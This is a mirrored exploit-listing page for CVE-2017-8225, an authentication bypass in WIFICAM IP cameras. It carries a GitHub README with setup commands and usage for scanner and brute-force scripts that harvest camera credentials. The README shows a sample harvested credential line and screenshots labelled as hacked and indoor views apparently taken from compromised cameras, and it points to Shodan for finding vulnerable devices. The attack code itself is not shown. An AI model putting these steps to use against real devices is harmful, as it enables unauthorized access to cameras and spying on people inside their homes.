CVE-2017-8225 PoC — Wireless IP Camera (P2P) WIFICAM 安全漏洞

Source

https://github.com/kienquoc102/CVE-2017-8225

Associated Vulnerability

Title:Wireless IP Camera (P2P) WIFICAM 安全漏洞 (CVE-2017-8225)
Description:On Wireless IP Camera (P2P) WIFICAM devices, access to .ini files (containing credentials) is not correctly checked. An attacker can bypass authentication by providing an empty loginuse parameter and an empty loginpas parameter in the URI.

Readme

# CVE-2017-8225

## Install Python3
        apt-get install git
        pip3 install requests
        pip3 install colorama
        sudo apt update
        apt-get install python3

## Installation:
	    git clone https://github.com/kienquoc102/CVE-2017-8225.git

## Code Exploit:
        cd CVE-2017-8225
	
        python3 scanip.py (Your File Text .txt)
        Example: python3 scanip.py scan.txt
	
	    python3 bruteip.py + (File Text .txt Above) + (File Text .txt Second)
        Example: python3 bruteip.py scan.txt vuln.txt
	    

# Hacked Main:
![1](screenshot/foto1.jpg)
![2](screenshot/foto2.jpg)

### [+]Found: admin|password|IP:192.xxx.xx.x:81

# Indoor:
![3](screenshot/cam1.png)
![4](screenshot/cam3.png)
![5](screenshot/cam4.png)       
![6](screenshot/cam5.png)
![7](screenshot/cam6.png)
![8](screenshot/cam8.png)
### This Exploit Check out the number of vulnerable cameras found on Shodan.

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →